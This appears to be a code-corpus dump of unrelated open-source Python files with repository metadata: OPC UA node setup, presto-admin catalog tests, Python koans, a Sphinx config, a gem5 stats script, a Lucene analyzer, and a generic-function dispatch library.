node.RequestedNewNodeId = NumericNodeId(11193, 0)
node.BrowseName = QualifiedName('AccessHistoryDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
    attrs.DisplayName = LocalizedText("AccessHistoryDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11193, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11242, 0)
node.BrowseName = QualifiedName('AccessHistoryEventsCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryEventsCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref
|
rackerlabs/solum-horizon
|
solumdashboard/exceptions.py
|
Python
|
apache-2.0
| 854
| 0.001171
|
# Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
#from solumclient.openstack.common.apiclient import exceptions as solumclient
NOT_FOUND = exceptions.NOT_FOUND
RECOVERABLE = exceptions.RECOVERABLE
# + (solumclient.ClientException,)
UNAUTHORIZED = exceptions.UNAUTHORIZED
|
prestodb/presto-admin
|
tests/unit/test_catalog.py
|
Python
|
apache-2.0
| 9,157
| 0.000655
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
tests for catalog module
"""
import os
import fabric.api
from fabric.operations import _AttributeString
from mock import patch
from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase
class TestCatalog(BaseUnitCase):
def setUp(self):
super(TestCatalog, self).setUp(capture_output=True)
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_not_exist(self, isfile_mock):
isfile_mock.return_value = False
self.assertRaisesRegexp(ConfigurationError,
'Configuration for catalog dummy not found',
catalog.add, 'dummy')
@patch('prestoadmin.catalog.validate')
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
isfile_mock.return_value = True
catalog.add('tpch')
filenames = ['tpch.properties']
deploy_mock.assert_called_with(filenames,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
validate_mock.assert_called_with(filenames)
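    # For reference, a minimal catalog file that the add/validate path above
    # expects looks like this (illustrative; not part of this test module):
    #
    #   # tpch.properties in the local catalog directory
    #   connector.name=tpch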
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.validate')
def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
deploy_mock):
catalogs = ['tpch.properties', 'another.properties']
listdir_mock.return_value = catalogs
catalog.add()
deploy_mock.assert_called_with(catalogs,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
isdir_mock.return_value = False
self.assertRaisesRegexp(ConfigFileNotFoundError,
r'Cannot add catalogs because directory .+'
r' does not exist',
catalog.add)
self.assertFalse(deploy_mock.called)
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
@patch('prestoadmin.catalog.os.remove')
def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
'then rm /etc/presto/catalog/tpch.properties ; '
'else echo "Could not remove catalog \'tpch\'. '
'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
exists_mock.return_value = True
fabric.api.env.host = 'localhost'
catalog.remove('tpch')
sudo_mock.assert_called_with(script)
local_rm_mock.assert_called_with(get_catalog_directory() +
'/tpch.properties')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_failure(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
out = _AttributeString()
out.succeeded = False
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] Failed to remove catalog tpch.',
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_no_such_file(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
error_msg = ('Could not remove catalog tpch: No such file ' +
os.path.join(get_catalog_directory(), 'tpch.properties'))
out = _AttributeString(error_msg)
out.succeeded = True
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] %s' % error_msg,
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
listdir_mock.return_value = []
catalog.add()
self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
' be deployed\n\n' % get_catalog_directory(),
self.test_stderr.getvalue())
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_permission_denied(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
error_msg = ('Permission denied')
listdir_mock.side_effect = OSError(13, error_msg)
fabric.api.env.host = 'localhost'
self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
catalog.add)
@patch('prestoadmin.catalog.os.remove')
@patch('prestoadmin.catalog.remove_file')
def test_remove_os_error(self, remove_file_mock, remove_mock):
fabric.api.env.host = 'localhost'
error = OSError(13, 'Permission denied')
remove_mock.side_effect = error
self.assertRaisesRegexp(OSError, 'Permission denied',
catalog.remove, 'tpch')
@patch('prestoadmin.catalog.secure_create_directory')
@patch('prestoadmin.util.fabricapi.put')
def test_deploy_files(self, put_mock, create_dir_mock):
local_dir = '/my/local/dir'
remote_dir = '/my/remote/dir'
catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
PRESTO_STANDALONE_USER_GROUP)
create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
mode=0600)
put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
mode=0600)
@patch('prestoadmin.catalog.os.path.isfile')
@patch("__builtin__.open")
def test_validate(self, open_mock, is_file_mock):
is_file_mock.return_value = True
file_obj = open_mock.return_value.__enter__.return_value
file_obj.read.return_value = 'connector.noname=example'
self.assertRaisesRegex
|
p(ConfigurationError,
'Catalog configuration example.properties '
'does not contain connector.name',
catalog.add, 'example
|
')
@patch('prestoadmin.catalog.os.path.isfile')
def test_validate_fail(self, is_file_mock):
is_file_mock.return_value = True
self.assertRaisesRegexp(
SystemExit,
'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
'Under
|
Krakn/learning
|
src/python/python_koans/python2/about_decorating_with_functions.py
|
Python
|
isc
| 832
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutDecoratingWithFunctions(Koan):
def addcowbell(fn):
fn.wow_factor = 'COWBELL BABY!'
return fn
@addcowbell
def mediocre_song(self):
return "o/~ We all live in a broken submarine o/~"
def test_decorators_can_modify_a_function(self):
self.assertMatch(__, self.mediocre_song())
self.assertEqual(__, self.mediocre_song.wow_fac
|
tor)
# ------------------------------------------------------------------
def xmltag(fn):
def func(*args):
return '<' + fn(*args) + '/>'
return func
@xmltag
def render_tag(self, name):
return name
def test_decorators_can_change_a_function_o
|
utput(self):
self.assertEqual(__, self.render_tag('llama'))
|
wintoncode/winton-kafka-streams
|
docs/conf.py
|
Python
|
apache-2.0
| 5,443
| 0.002021
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Winton Kafka Streams Python documentation build configuration file, created by
# sphinx-quickstart on Tue May 16 21:00:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Get the project root dir
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import winton_kafka_streams
from mock import MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return MagicMock()
MOCK_MODULES = ['confluent_kafka', 'confluent_kafka.cimpl', 'confluent_kafka.avro']
sys.modules.update((mod_name, Mock()
|
) for mod_name in MOCK_MODULES)
# -- General configuration ------------------------------------------------
# If your documentati
|
on needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Winton Kafka Streams Python'
copyright = '2017, Winton Group'
author = 'Winton Group'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from setuptools_scm import get_version
version = release = get_version(root='..')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WintonKafkaStreamsPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WintonKafkaStreamsPython.tex', 'Winton Kafka Streams Python Documentation',
'Winton Group', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'wintonkafkastreamspython', 'Winton Kafka Streams Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WintonKafkaStreamsPython', 'Winton Kafka Streams Python Documentation',
author, 'WintonKafkaStreamsPython', 'One line description of project.',
'Miscellaneous'),
]
|
Avantol13/mgen
|
dev/scripts/_project_cfg_importer.py
|
Python
|
gpl-3.0
| 1,937
| 0.005163
|
"""
Project Configuration Importer
Handles importing the project configuration from a separate location
and validates the version against the specified expected version.
NOTE: If you update this file or any others in scripts and require a
NEW variable in project_cfg, then you need to UPDATE THE EXPECTED_CFG_VERSION
That way, if someone tries to use the new scripts with an old cfg, they'll
get a warning.
"""
import importlib
import os
import sys
PROJECT_CFG_DIR = os.path.realpath(os.path.dirname(__file__) + "/../../cfg/")
PROJECT_CFG_NAME = "project_cfg"
EXPECTED_CFG_VERSION = 1.1
def get_project_cfg():
"""
Returns the project configuration module
"""
sys.path.append(PROJECT_CFG_DIR)
try:
project_cfg_module = importlib.import_module(PROJECT_CFG_NAME)
except:
raise FileNotFoundError("\n\n=======================
|
========== ERROR ========================================"
"\nUnable to import project configuration: " + PROJECT_CFG_DIR + "/" + PROJECT_CFG_NAME + ".py"
"\n===========================================
|
=====================================\n")
_verify_correct_version(project_cfg_module)
return project_cfg_module
def _verify_correct_version(project_cfg_module):
is_correct_version = False
if project_cfg_module.__CFG_VERSION__ == EXPECTED_CFG_VERSION:
is_correct_version = True
else:
raise Exception("\n\n================================= ERROR ========================================"
"\nIncorrect project configuration version: " + str(project_cfg_module.__CFG_VERSION__) +
"\n Development environment expected: " + str(EXPECTED_CFG_VERSION) +
"\n================================================================================\n")
return is_correct_version
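# Illustrative usage (assumed, not part of the original module):
#     project_cfg = get_project_cfg()
#     print(project_cfg.__CFG_VERSION__)  # e.g. 1.1
# get_project_cfg() raises if cfg/project_cfg.py cannot be imported, and
# raises an Exception when __CFG_VERSION__ differs from EXPECTED_CFG_VERSION.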
|
bcheung92/Paperproject
|
gem5/pyscript/cachecmp.py
|
Python
|
mit
| 2,915
| 0.026072
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern
|
.search(threadlines)
threadendmatch = threadendPatte
|
rn.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
|
CMUSV-VisTrails/WorkflowRecommendation
|
vistrails/index/vistrailanalyzer.py
|
Python
|
bsd-3-clause
| 4,209
| 0.012354
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import re
from lucene import *
import lucene
dir(lucene)
class vistrailAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = vistrailFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
class stemmingAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
# patterns for splitting words into substrings
patterns = [
|
# 32 char md5 sums
"[a-f0-9]{32}",
# '2D', '3D'
"2D", "3D",
# words beginning with capital letters
"[A-Z][a-z]+"
|
,
# capital letter sequence ending with a word that begins with a capital letter
"[A-Z]*(?=[A-Z][a-z])",
# capital letter sequence
"[A-Z]{2,}",
# non-capital letter sequence
"[a-z]{2,}" ]
splitPattern = re.compile("|".join(patterns))
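# Illustrative behaviour of the split pattern (example token assumed, not
# taken from the original source): splitPattern.findall("VTKRenderWidget2D")
# yields "VTK", "Render", "Widget" and "2D"; vistrailFilter below emits these
# parts alongside the full token so camel-case names become searchable.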
class vistrailFilter(PythonTokenFilter):
TOKEN_TYPE_PART = "text"
def __init__(self, input):
super(vistrailFilter, self).__init__(input)
self.input = input
self.parts = [] # parts found for the current token
self.current = None
def next(self):
if self.parts:
# continue adding parts
part = self.parts.pop()
t = Token(part, self.current.startOffset(),
self.current.endOffset(), self.TOKEN_TYPE_PART)
t.setPositionIncrement(0)
return t
else:
# find parts
self.current = self.input.next()
if self.current is None:
return None
text = str(self.current.termText())
pattern = splitPattern.findall(text)
# remove single characters and duplicates
pattern = set([p for p in pattern if len(p)>1 and p != text])
# if len(pattern) > 0:
# print "vistrailFilter", text, "-->",','.join(pattern)
self.parts = pattern
return self.current
|
ikalnytskyi/holocron
|
src/holocron/_processors/_misc.py
|
Python
|
bsd-3-clause
| 4,296
| 0.000466
|
"""Various miscellaneous functions to make code easier to read & write."""
import collections.abc
import copy
import functools
import inspect
import logging
import urllib.parse
import jsonpointer
import jsonschema
_logger = logging.getLogger("holocron")
def resolve_json_references(value, context, keep_unknown=True):
def _do_resolve(node):
node = copy.copy(node)
if isinstance(node, collections.abc.Mapping) and "$ref" in node:
uri, fragment = urllib.parse.urldefrag(node["$ref"])
try:
return jsonpointer.resolve_pointer(context[uri], fragment)
except KeyError:
if keep_unknown:
return node
raise
elif isinstance(node, collections.abc.Mapping):
for k, v in node.items():
node[k] = _do_resolve(v)
elif isinstance(node, collections.abc.Sequence) and not isinstance(node, str):
if not isinstance(node, collections.abc.MutableSequence):
node = list(node)
for i in range(len(node)):
node[i] = _do_resolve(node[i])
return node
return _do_resolve(value)
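# Minimal sketch of how this helper behaves (hypothetical data, not from the
# original source):
#     context = {"settings://": {"site": {"url": "https://example.com"}}}
#     resolve_json_references({"$ref": "settings://#/site/url"}, context)
#     # -> "https://example.com"
# Unknown "$ref" targets are returned verbatim when keep_unknown=True;
# otherwise the underlying KeyError propagates.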
class parameters:
def __init__(self, *, fallback=None, jsonschema=None):
self._fallback = fallback or {}
self._jsonschema = jsonschema
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(app, *args, **kwargs):
signature = inspect.signature(fn)
arguments = signature.bind_partial(app, *args, **kwargs).arguments
# First two arguments always are an application instance and a
# stream of items to process. Since they are passed by Holocron
# core as positional arguments, there's no real need to check their
# schema, so we strip them away.
arguments = dict(list(arguments.items())[2:])
parameters = dict(list(signature.parameters.items())[2:])
# If some parameter has not been passed, a value from a fallback
# must be used instead (if any).
for param in parameters:
if param not in arguments:
try:
value = resolve_json_references(
{"$ref": self._fallback[param]},
{"metadata:": app.metadata},
)
except (jsonpointer.JsonPointerException, KeyError):
continue
# We
|
need to save resolved value in both arguments and
# kwargs mappings, because the former is used to *validate*
# passed arguments, and the latter to supply a value from a
# fallback.
arguments[param] = kwargs[param] = value
if self._jsonschema:
try:
format_checker = jsonschema.FormatChecker()
@format_checker.checks("encoding", (LookupError,))
|
def is_encoding(value):
if isinstance(value, str):
import codecs
return codecs.lookup(value)
@format_checker.checks("timezone", ())
def is_timezone(value):
if isinstance(value, str):
import dateutil.tz
return dateutil.tz.gettz(value)
@format_checker.checks("path", (TypeError,))
def is_path(value):
if isinstance(value, str):
import pathlib
return pathlib.Path(value)
jsonschema.validate(
arguments,
self._jsonschema,
format_checker=format_checker,
)
except jsonschema.exceptions.ValidationError as exc:
message = exc.message
if exc.absolute_path:
message = f"{'.'.join(exc.absolute_path)}: {exc.message}"
raise ValueError(message)
return fn(app, *args, **kwargs)
return wrapper
|
adh/py-clos
|
py_clos/base.py
|
Python
|
mit
| 7,245
| 0.003313
|
# -*- mode: python -*-
from .combinations import STANDARD_METHOD_COMBINATION
from .specializers import specializer, ROOT_SPECIALIZER
from . import util
from .cache import NoCachePolicy, LRU, TypeCachePolicy
import threading
import inspect
import warnings
try:
from ._py_clos import GenericFunction as GenericFunctionBase
except ImportError:
class GenericFunctionBase:
def __call__(self, *args, **kwargs):
return self.call_slow_path(args, kwargs)
        def initialize_cache(self, map, size, grow=False):
            # signature matched to the three-argument calls made by initialize_c_cache()
            pass
class GenericFunction(GenericFunctionBase):
def __init__(self, name):
self._name = name
self._method_combination = STANDARD_METHOD_COMBINATION
self._methods = []
self._specialized_on = []
self._cache_policies = []
self._lock = threading.Lock()
self.clear_cache()
def redefine(self, method_combination=None):
if method_combination is not None:
self._method_combination = method_combination
self.clear_cache()
def get_cache_size(self):
return len(self._methods) * 4
def cache_should_grow(self):
for i in self._cache_policies:
if i != TypeCachePolicy:
return False
return True
def clear_cache(self):
if self._cache_policies is None:
self._cache = None
else:
for i in self._cache_policies:
if i != TypeCachePolicy:
self._cache = LRU(self.get_cache_size())
return
self._cache = {}
        # the idea is that the number of possible types is clearly bounded
# so limiting the cache size is unnecessary
def rebuild_specialized_on(self):
maxlen = max((len(i.specializers) for i in self._methods))
bitmap = [False] * maxlen
for i in self._methods:
for j in i.specialized_on:
bitmap[j] = True
self._specialized_on = [idx for idx, i in enumerate(bitmap) if i]
def rebuild_cache_policies(self):
arglen = max((len(i.specializers) for i in self._methods))
spec_count = len(self._specialized_on)
cps = [[]] * spec_count
for i in self._methods:
for idx, j in enumerate(self._specialized_on):
if j >= len(i.specializers):
continue
spec = i.specializers[j]
if spec is None:
continue
cps[idx].append(spec.cache_policy)
cps = [util.common_superclass(*i) for i in cps]
        for i in cps:
            if i is NoCachePolicy:
                self._cache_policies = None
                return
        self._cache_policies = cps
def get_cache_map(self):
maxlen = max((len(i.specializers) for i in self._methods))
key = [b"_"] * maxlen
for idx, cp in zip(self._specialized_on, self._cache_policies):
if not hasattr(cp, "c_cache_key"):
return None
key[idx] = cp.c_cache_key
return b"".join(key).rstrip(b'_')
def initialize_c_cache(self):
cm = self.get_cache_map()
if not cm:
self.initialize_cache(b"", 0, False)
else:
self.initialize_cache(cm,
self.get_cache_size(),
self.cache_should_grow())
def add_method(self, method):
with self._lock:
self._methods.append(method)
self.rebuild_specialized_on()
self.rebuild_cache_policies()
self.initialize_c_cache()
self.clear_cache()
def get_cache_key(self, args):
return tuple((cp.get_cache_key(args[self._specialized_on[idx]])
for idx, cp in enumerate(self._cache_policies)))
def get_applicable_methods(self, args):
return sorted((i for i in self._methods if i.matches(args)),
key=lambda i: i.sort_key(args))
def get_effective_method(self, args):
with self._lock:
methods = self.get_applicable_methods(args)
return self._method_combination.compute_effective_method(methods)
def call_slow_path(self, args, kwargs={}):
if self._cache is not None:
ck = self.get_cache_key(args)
if ck in self._cache:
return self._cache[ck](*args, **kwargs)
effective_method = self.get_effective_method(args)
if self._cache is not None:
self._cache[ck] = effective_method
return effective_method(*args, **kwargs)
class Method:
__slots__ = ["proc", "specializers", "qualifiers", "next_method_arg"]
def __init__(self, proc,
specializers=[],
qual
|
ifiers=[],
next_method_arg=None):
self.proc = proc
self.specializers = specializers
self.qualifiers = qualifier
|
s
self.next_method_arg = next_method_arg
@property
def specialized_on(self):
return [idx for idx, i in enumerate(self.specializers) if i != None]
def matches(self, args):
for idx, i in enumerate(self.specializers):
if i is None:
continue
if not i.matches(args[idx]):
return False
return True
def sort_key(self, args):
res = []
for idx, i in enumerate(self.specializers):
if idx >= len(args):
break
if i is None:
i = ROOT_SPECIALIZER
res.append(i.sort_key(args[idx]))
return res
@classmethod
def from_annotated_function(cls, proc, qualifiers=[]):
argspec = inspect.getfullargspec(proc)
arg_names = argspec.args[:len(argspec.args) - len(argspec.defaults or [])]
anno = proc.__annotations__
specializers = [(specializer(anno[i]) if i in anno else None)
for i in arg_names]
return cls(proc,
specializers=specializers,
qualifiers=qualifiers,
next_method_arg=("next_method"
if "next_method" in argspec.args else None))
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
@property
def callable(self):
return self.callable_with_next_method()
def callable_with_next_method(self, next_method=None):
if self.next_method_arg:
def wrapper(*args, **kwargs):
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
return wrapper
else:
return self.proc
def call_method(self, args, kwargs, next_method=None):
if self.next_method_arg:
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
else:
return self.proc(*args, **kwargs)
def defgeneric(name, **kwargs):
gf = GenericFunction(name)
gf.redefine(**kwargs)
return gf
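# Rough usage sketch (assumed API, inferred only from the code above):
#     describe = defgeneric("describe")
#     describe.add_method(Method.from_annotated_function(
#         lambda obj: "value: %r" % (obj,)))
#     describe(42)  # dispatches via call_slow_path and the method cache
# Specializers come from parameter annotations; an un-annotated parameter
# matches any argument.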
|
sridevikoushik31/nova
|
nova/tests/virt/xenapi/test_volumeops.py
|
Python
|
apache-2.0
| 8,108
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
